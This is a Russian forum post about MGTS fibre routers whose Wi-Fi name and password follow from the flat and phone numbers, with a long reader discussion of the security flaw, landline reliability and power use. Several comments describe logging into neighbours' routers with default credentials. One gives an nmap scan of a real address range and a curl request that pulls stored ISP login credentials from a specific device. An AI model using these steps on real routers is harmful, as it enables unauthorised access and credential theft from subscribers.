Об особенностях настроек безопасности «Интернет от МГТС»

    Сейчас в ЮЗАО г.Москвы (а быть может и по всей столице) происходит замена телефонного оборудования МГТС — двужильные медные провода меняют на оптоволокно. К вам домой приходят инженеры, устанавливают роутер, включают в него ваш старый RJ11, а медный провод обесточивается. Делается это бесплатно и довольно навязчиво, МГТС утверждает, что тем абонентам, которые сейчас откажутся от бесплатной замены оборудования, в последствии придется делать то же самое за свои деньги (что, судя по всему, прямо противоречит законам, но пост не об этом). Роутер, естественно, запитывается от розетки 220В, т.е. счет абонента за электричество теперь будет больше. Кроме того, если в доме выключается электричество, то выключается и стационарный телефон (поскольку роутер обесточивается). Но речь и не об этом тоже.

    Речь о поразительной находчивости инженеров МГТС, придумавших следующую «систему» настроек безопасности WiFi этих роутеров. Каждый такой роутер имеет SSID формата mgts278, где число 278 — это номер квартиры, в которой устройство установлено. А пароль к этому роутеру имеет формат 4954257998, т.е. просто номер телефона данной квартиры. При этом у ВСЕХ абонентов в роутере есть интернет, который раздается по такой SSID. Конкретные примеры: один абонент пользуется интернетом другого провайдера, но его МГТС-роутер ведет интернет-вещание по схеме, описаной выше. У другой абонентки дома нет ни одного компьютера вообще, но и у нее работает WiFi-сеть и раздает интернет.
    Но бесплатный интернет — это хорошо. Плохо другое. Потенциальному злоумышленнику достаточно научиться связывать номер квартиры и номер телефона, чтобы, скажем, оставить весь дом без стационарной связи, заходя по очерерди на каждый роутер, и уничтожая или изменяя профили IP-телефонии (а заодно и IP-TV, если оно есть у абонента). Или, скажем, можно попытаться украсть чей-то городской номер (как раньше воровали номера ICQ), просто поменяв MAC-адреса своего и чужого роутера (это, впрочем, только моя гипотеза).
    Примеры я привел совершенно конкретные, сам на эти роутеры заходил. mgts278 — это имя сети квартиры, где я живу (а номер её 4954257998). Пароль от сети на своем роутере я конечно поменял, но ведь много людей, совершенно не обязанных в этом разбираться, и компания МГТС оставляет их городской телефон совершенно уязвимым к описаным выше вариантам атак.
    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More
    Ads

    Comments 71

      +12
      в моем доме у всех по умолчанию пароль mgtswifi и этот пароль без проблем сообщают по телефону в мгтс.
        0
        Еще лучше!
        +2
        Если вы внимательно прочитаете все бумажки которые Вам оставил монтажник (а их чет около 6), то в одной увидите, что каждому абоненту включается демо режим интернета, кажется на 3 месяца. По истечение этого срока, если Вас устроит качества связи, вы должны будете перезаключить договор и платить абонентскую плату.
        Таким образом выходит, что через 3 месяца этот wi-fi превратится в радиопомехи, а те, кто умеет пользоваться роутерами и интернетом сами все перенастроят и сменят пароли.
        P.S. Телефон это RJ11
          0
          Не было такого.Видимо в разных районах разные условия.
            0
            Да, нас предупреждали, что 1 месяц. Но этот месяц у одного из упомянутых в статье абонентов (который пользуется сторонним провайдером) прошел.
            Спасибо, исправил.
              0
              Но в любом случае, я не думаю что МГТС нам вот так просто будет дарить интернет, в один прекрасный день он все равно отключится.
              Просто все сведется к тому, что производители оборудования тоже редиски, ведь с завода на роутерах вообще стоят admin//admin или admin/12345.
              По хорошему счету уже давно нужно переходить на режим «нажми кнопку чтобы подключиться» (не помню как он называется по английски), особенно для таких массовых установок.
                +2
                Тут речь не столько о халявном интернете (что, повторюсь, есть абсолютное благо). Речь о том, что любой школьник может положить стационарный номер училки, поставившей ему двойку. А если у школьника еще есть мозги и техническая фантазия, то развернуться с антисоциальными экспериментами тут точно есть где.
                  +4
                  А нефиг было обещать родителям вечером позвонить! ;)

                  Но для школоты наличие поля для экспериментов это благо скорее — глядишь, научатся чему-нибудь. Вырастут — и не будет в очередном МГТСе такого бездумного провала.
              0
              Подтверждаю, ВАО, тестовый режим — 1 месяц.
              +9
              Т.е. если загорится электропроводка, телефон 100% тоже работать не будет. Ооок.
                0
                По-моему, это не проблема — у всех есть сотовые телефоны на случай ЧП.
                +3
                Еще одна проблема — 100-200 сетей в доме, и большинство ведь ненужно никому. Свой роутер теперь забивать будут.
                  +3
                  Помнится у правительства Москвы был проект по покрытию всего мегаполиса сетью WiFi доступа. Так вот-кажется этот проект начал реализовыватся…
                    +1
                    Может проект Hiperborea? (если я правильно название запомнил ).
                    0
                    А я нагло заюзал их роутер в качестве точки доступа, изменив ssid, выключив dhcp, что бы раздавать свой вай-фай ))
                      +12
                      Как же они засрали мне весь частотный диапазон в 2.4Ghz!
                      Они зачем-то врубали Wi-Fi даже бабулям и одиноким алкоголикам.
                      Потом пришлось бегать с ноутом по этажам (2 вниз, 2 вверх), подключаться к одинаково выглядящим «SSID» без пароля, залезать в админку роутера (через заводские логин и пароль, ага) и вырубать Wi-Fi
                      Штук 6 выключил!
                        +2
                        А дайте, пожалуйста, пару ссылочек или намёков как это провернуть, а то у нас в каждой второй квартире бабушка с Wi-Fi ((
                          +2
                          Я ставил на ноут inSSIDer и поднимался на этаж.
                          Смотрел, какая сеть в данном месте мощнее, есть ли у нее защита (если нет, то скорее всего можно отключать; если есть, то наверняка пользуются), подключался к ней (кажется, в диспетчере сетей Win7 вверху списка находится самая мощная сеть, поэтому inSSIDer помогал определиться, кто где. К тому же он выделяет жирным ту сеть, к которой вы сейчас подключены), заходил на 192.168.1.1 с логином и паролем, найденными на сайте производителя, в админке выключал Wi-Fi и там же перезагружал устройство.

                          Правда, через пару месяцев я купил себе двухдиапазонный роутер и на ту помойку теперь смотрю с легкой улыбкой :)
                            0
                            Спасибо, попробую)
                            +4
                            Москва, я вижу, зажигает :)
                            Может кто не знает, подскажу решение без вырубания точек по этажам.
                            Заходим в свой роутер в настройки Wi-Fi, там ищем Регион и выбираем Новая Зеландия.
                            После этого у нас станет доступны верхние диапазоны частот (11-13 каналы).
                            Выбираем, скажем, 12 или 13 и вуаля, никаких помех и вы одни в этом диапазоне.
                            Конечно бывают исключения, когда рядом с вами живет такой же умный, как и вы.
                              +1
                              А после таких действий не стоит бояться черных пативенов?
                                0
                                уже пару лет на «запрещенном» диапазоне, проблем не было.
                                0
                                К сожалению, если в доме есть устройства, купленные в Штатах, сети они не увидят. Им доступны каналы 1-11, в Европе в большинстве случаев — 1-13, в Японии — 1-14 (речь, конечно, же, про диапазон 2.4 ГГц)
                            +1
                            А у нас еще проще поступили: № квартиры — да, действительно светит после слова mgts, но пароль — вида «12345!@#$%» или символы с цифрами наоборот, уже не помню. Но это еще что, ip-адреса на модемы даются внутренние, есть возможность в пределах своей подсети найти другие модемы. С учетом одинаковости паролей на админки в т.ч. на телнет, В МГТС сидят очень глупые люди: ни тех. поддержка, ни третья линия, или как их там, не знают, что такое NTP. И они не знают, что его надо в настройках ONT прописывать, иначе на некоторых моделях ТА время будет сбиваться на аптайм ONT. Месяц с ними боролся, подавал запросы в рекламации, всё, что они могли сделать — дважды выслать монтов, в обязанности которых сие не входит по определению. Пришлось лезть самому, пока был демо-доступ. Пришлось также из-за этого даже заводить UPS, чтобы не дай боже, модем не ребутнулся от мигания электрики.
                              0
                              Простите, не понял, не так глубоко разбираюсь. Что дает возможность найти другие модемы? И какая разница какое время идет на роутере?
                                +1
                                > Что дает возможность найти другие модемы?
                                Все плюшки, описанные в статье + возможность не бегать по подъезду, чтобы подключаться к удалённым роутерам.
                                  0
                                  Разница такова, что некоторые ТА, например, радиотрубки пр-ва Siemens, получают время при каждом входящем звонке от станции, или, в данной ситуации — от ONT. Если на ONT время будет прописано неверно, никакие ручные прописания времени на ТА не помогут, время будет показываться строго по аптайму ONT.
                                +8
                                Вау, это ж какую mesh сеть то построить можно будет!
                                Это все хитрый план против попыток блокировки интернета — в москве потихоньку создается новая mesh сеть :)
                                  +1
                                  В Санкт-Петербурге такое же было, звонили агрессивно настроенные сотрудники Ростелекома, говорили что нужно перейти на оптику (аргументы то что их китайский не промышленный медиаконвертер менее надёжный чем медь, и без электричества не работает не воспринимали — по их мнению их медиаконвертер вечен а без электричества телефон никому не нужен да и его не отключают никогда), в противном случае говорили что отключат телефон и другим подобным образом бессовестно врали и дезинформировали.
                                    0
                                    И чем кончилось? Медь отключили в итоге?
                                      0
                                      Изначально, когда они позвонили, я с ними ругался не потому что оптика не нужна, а потому что нужно было подумать, почитать отзывы. Да и вообще первая реакция на «вы обязаны подключить» — «нет не обязан». Так что потом я сам согласился. В любом случае по закону они имеют право сменить номер на номер из соседней АТС, долго чинить линию и устраивать другие препятствия.
                                        0
                                        В Москве медь банально вырезают физически, так что ее просто не останется.
                                        0
                                        В СПб для некоторых районов это все же большой шаг вперед — это в Москве в каждом доме по паре ethernet-провайдеров, а здесь кое-где на выбор либо ADSL, либо КТВ — и то и то довольно уныло. Еще бы «медь» при этом оставляли для экстренных вызовов, хотя бы на исходящие.
                                          0
                                          Да тут тоже, в спальных районах (т.е. кроме центра и деревень за пределами города) везде ethernet есть по идее. У меня как-то было подключено аж 4 провайдера (когда они все были ненадёжными).
                                          +2
                                          Года два назад работал монтажником и угадайте, чем занимался. На деле, Ростелеком этим не занимается, они всё скидывают на субподрядчиков, в подобной компании я и работал. Звонит тоже не Ростелеком, после чего агрессия (хотя у нас, вроде как милые девушки были) понятна. Больше переключений — больше денег. Мы с другом отработали ровно два переключения. Оба были ужасным геморром.
                                          Лапша просто срезалась, оптику прокладывали +- пару метров от входной двери, телефон подключался к оптическому преобразователю примерно на таком же расстояние, ибо экономия. Сказали, что надо говорить, типо работать будет плохо и оставляли один телефон на квартиру. Каждому абоненту приходилось рассказывать кто мы такие и зачем пришли.
                                            +1
                                            Ага, вот вот, оптика только в паре метров от двери, сказали что работать будет плохо :)
                                            +1
                                            аргументы то что их китайский не промышленный медиаконвертер менее надёжный чем медь, и без электричества не работает не воспринимали — по их мнению их медиаконвертер вечен а без электричества телефон никому не нужен да и его не отключают никогда

                                            Ну не медиаконвертер же. Медиаконвертер — абсолютно другой тип устройства. То, о чём вы говорите — есть ONU, Optical Network Unit, он же абонентский терминал, оконечное устройство в xPON-сетях. Скорее всего Huawei'евский, вроде как на них РТ остановились. По сути — раутер с SIP-шлюзом (2-4 FXS) и аплинком в виде WDM-SFP tx:1310nm/rx:1490nm c SC-разъёмом.
                                            0
                                            А что за модели роутеров?
                                            Правильно ли я понимаю, что при определенных условиях можно позвонить на какой-нибудь номер кекса по телефону, или в Сомали?
                                              +3
                                              whois 95.26.71.218
                                              
                                              …
                                              inetnum:        95.24.0.0 - 95.30.255.255
                                              netname:        BEELINE-BROADBAND
                                              descr:          Dynamic IP Pool for broadband customers
                                              …
                                              

                                              nmap -v -p80 95.26.0.0/16 | grep open
                                              
                                              …
                                              Discovered open port 80/tcp on 95.26.8.198
                                              Discovered open port 80/tcp on 95.26.65.91
                                              Discovered open port 80/tcp on 95.26.65.140
                                              Discovered open port 80/tcp on 95.26.65.174
                                              …
                                              

                                              curl -b 'client_login=admin; client_password=admin; user_ip=0.0.0.0' "http://95.26.8.198/index.cgi?v2=y&rq=4&res_json0=y&res_config_action0=1&res_config_id0=1&res_struct_size0=1&res_config_action1=1&res_json1=y&res_config_id1=35&res_struct_size1=69&res_json2=y&res_config_action2=1&res_config_id2=119&res_struct_size2=1&res_json3=y"
                                              
                                              …
                                              "firewall": true,
                                              "password": "1734**7Lena",
                                              "username": "089***5655",
                                              …
                                              


                                              dir-300 почти у всех, там же и ssid/passwd от wifi, в личном кабинете личные данные.
                                                0
                                                Нам поставили какой то ZTE. и питание притянули из подъезда)
                                                  0
                                                  Получается, имеет смысл требовать протяжки отдельной линии питяния в обход счётчика?
                                                    +2
                                                    Мне тоже протянули из подъезда, только провод ведет в щиток к моим же проводам после счетчика
                                                      0
                                                      Не очень понимаю — а смысл? Не проще от какой-то квартирной розетки запитаться?
                                                        0
                                                        У меня в коридоре нет ни одной розетки (такая уж планировка), да и мастер сказал, что соплей не должно висеть, все тык-в-притык, все убрано в короб.
                                                          0
                                                          Окей. А про короб хорошо, что сразу убирают.
                                                            0
                                                            На самом деле то да, но все равно волокно в свободном доступе в подъезде. Не понимаю, почему нельзя было развести их по шахтам вместо меди.
                                                              0
                                                              при минусе вандализма — минимум 2 плюса:
                                                              1) быстрый доступ к волокну (в большинстве многоэтажных домов
                                                              доступ в квартирные холлы заблокирован).
                                                              2) что только не делают монтажники и электрики
                                                              с проводами в «шахтах», волокну там не выжить.
                                                                +1
                                                                Думаете так надежнее?image
                                                                  0
                                                                  Да, подрядчик схалтурил. Хотя и не сильно:
                                                                  пластиковые трубки с изгибом должны слегка заходить в щиток,
                                                                  выходящий в квартиры кабель должен быть полностью в коробе.

                                                                  Но посмотрите: сам по себе провод не отвалится, не прогорит от соседних, его не будут дергать при пропихивании очередного UTP (фото щитка в квартирном холле не могу приложить, но там страх что творится). Остается только вандализм.
                                                0
                                                А зачем кому-то в наше время может понадобиться домашний телефон?
                                                  +3
                                                  Вызов экстренных служб. В случае с медью — даже при аварии на электроподстанции
                                                  и недоступности базовых станций сотовой связи.
                                                    +1
                                                    Слабый аргумент. Во многих регионах коммутаторы ТФОП (стационарных телефонов) находятся в одном здании с коммутаторами мобильных операторов. Объясняется это тем, что в регионах оптоволокно обычно принадлежит операторам стационарной связи и сотовики его арендуют. Соответственно, как электропитание, так и оптоволокно до соседних станций ТФОП у них общие. Поэтому вероятность отключения сотовой связи примерно равна вероятности отключения стационарной. Разве что, у мобильных операторов UPS-ники помощнее. Так что в случае аварии они и протянут подольше.

                                                    Поддерживаю предыдущего оратора: я у себя в квартире давно отключил стационарный телефон. К тому же, по нему постоянно звонили, предлагая всякие услуги, рекламу, либо автоинформатор МГТС. А абонентов кто бы мне звонил и у кого нет мобильника, в моей жизни уже не осталось. Даже бабушка жены научилась звонить по мобильнику, и даже СМС-ки пытается писать. ))
                                                      0
                                                      Ну что вы, право слово… Дают — бери, что называется. Почему бы не подвесить этот городской номер на тот же самый астер? И как минимум делать проброс звонка на мобильный при звонке на городской в зависимости, например, от времени суток. Да дофига чего можно сделать=) Хоть IVR прикрутить на домашний телефон, автоответчик и голосовую почту=) Нувыпонели.
                                                        0
                                                        При чем тут регионы? Мы рассматриваем конкретную ситуацию в регионе 77. В котором, если например случится ЧП, и выключится электричество, старая бабушка теперь не сможет позвонить в МЧС. А раньше смогла бы.
                                                          0
                                                          У бабушки явно есть сотовый. Я не знаю ни одной бабушки, даже самой древней, у которой не было бы сотового телефона. Потому как она, например, на дачу с ним ездит.
                                                    +1
                                                    По поводу перебоев с питанием — у Huawei hg8245, который поставили конкретно мне, на боку есть разъем для резервной батареи. Где ее взять, правда, не знаю.
                                                      0
                                                      А что за модели ZTE ставят?
                                                      Видел у бабушки, интересно, что за железяка

                                                      ЗЫ Да ещё и выглядит очень симпатично
                                                        0
                                                        HUAWEI HG8240
                                                          0
                                                          Не, точно висит ZTE, а не HUAWEI

                                                          Белого цвета с узором из маленьких красных квадратов.
                                                        0
                                                        а нету отдельной темы про законность всего этого дела? что делать, если я не хочу себе никаких роутеров и смены места размещения телефона?
                                                          0
                                                          Зачем? Причем если часть пользователей «на всякий случай» откажется, то это вынудит операторов ГТС поддерживать и устаревшее оборудование, что вызовет подорожание услуг для всех без исключения.

                                                          Борьба с проведением оптики мне напоминает борьбу с переходом на цифровые АТС. Там-то проблем еще больше было — заставляли бедных клиентов переходит с советских телефонов на телефоны с тоновым набором. Грабеж!
                                                            0
                                                            вообще-то Цифровые АТС поддерживают импульсный режим набора номера.
                                                              0
                                                              Что-то не припоминаю такого. Наш советский «барабанный» телефон с переходом на цифровую АТС работать перестал, помню 100%.
                                                                0
                                                                Знач зависит от модели. У нас работало нормально.
                                                              0
                                                              Ну, например, я не собираюсь вешать в своей квартире их убожеское оборудование. Не собираюсь подключать его к своей электрической розетке (на ixbt подсчитали, что это увеличить стоимость услуг их связи на 40 рублей).
                                                              Так же вы забываете, что переход на эту цифру полностью уничтожает систему оповещения по ГО и ЧС.
                                                                0
                                                                Ну, например, я не собираюсь вешать в своей квартире их убожеское оборудование.

                                                                Почему убожеское? Роутер у вас явно стоит, интернет ведь есть. Поставите вместе.
                                                                Не собираюсь подключать его к своей электрической розетке (на ixbt подсчитали, что это увеличить стоимость услуг их связи на 40 рублей).

                                                                Плохо посчитали. 40 рублей? Т.е. при цене в эдак 2 рубля за киловатт — выходит, что 20 кВт за месяц, 0,7 кВт в сутки? Соответственно, потребляемая мощность «коробочки» — 30 Вт*ч? Нужно ли говорить, что это бред? Потребляемая мощность среднего WiFi-роутера (пример) — эдак 3.5 Вт*ч, т.е. в 10 раз меньше.

                                                                Выключите у «коробочки» WiFi и будет и вовсе порядка 1-2 ватт. За даже пускай 5-10 руб/мес, думаю, ничего ни с кем не случится, даже древней бабушкой. Прогресс важнее.
                                                                Так же вы забываете, что переход на эту цифру полностью уничтожает систему оповещения по ГО и ЧС.

                                                                Как в системе оповещения по ГО и ЧС используются стационарные телефоны? Если что-то и будет — скорее уж СМС всем раскидают.
                                                                  –1
                                                                  Почему убожеское? Роутер у вас явно стоит, интернет ведь есть. Поставите вместе.

                                                                  Потому что убожеское. Я использую роутер, который я выбрал для себя. У себя в туалете указывайте, что кому и где поставить.
                                                                  Плохо посчитали.

                                                                  Если вам не известно, то цена электричества в квартире с газовой плитой 4.5 рубля за 1 кВт. Потребляет в среднем 12 Вт\ч. «зеленые» роутеры не стоит приводить в пример. Смотреть надо на те хуавеи, которые они ставят.
                                                                  Как в системе оповещения по ГО и ЧС используются стационарные телефоны?

                                                                  Вы в каком веке живете? Если что-то происходит в Москве, то СМС работать не будет. Т.к. будет положена вся мобильная сеть. Доказано всеми терактами и Новым Годом.
                                                                  Если происходит что-то с подстанцией, когда в половине Москвы не было электричества, то все стационарные телефоны отлично работали. (в отличии от мобильных).

                                                                  Функционально АИУС РСЧС состоит из основной, резервной и дублирующей подсистем, в состав которых включены:

                                                                  — сеть связи и передачи данных (ССПД), обеспечивающая телефонную, телеграфную, факсимильную, селекторную связь, передачу сигналов оповещения…
                                                          • UFO just landed and posted this here
                                                              +1
                                                              Интересно, а такое количество источников радиоизлучения не нарушает ли санитарные нормы?
                                                                0
                                                                А кого это волнует? Только всяких полуумных бабулек с шапочками из фольги, которым нечем заняться.
                                                                  +1
                                                                  Ну вообще-то людей умных это тоже должно волновать. Вспомните про европейские нормы по SAR. Наши, кстати, жестче.
                                                                  Но почему-то никто не считает излучения от понатыканных везде роутеров.
                                                                  В принципе и долгосрочных иследований, как я понимаю, о влиянии на человека этих излучений нет.

                                                              Only users with full accounts can post comments. Log in, please.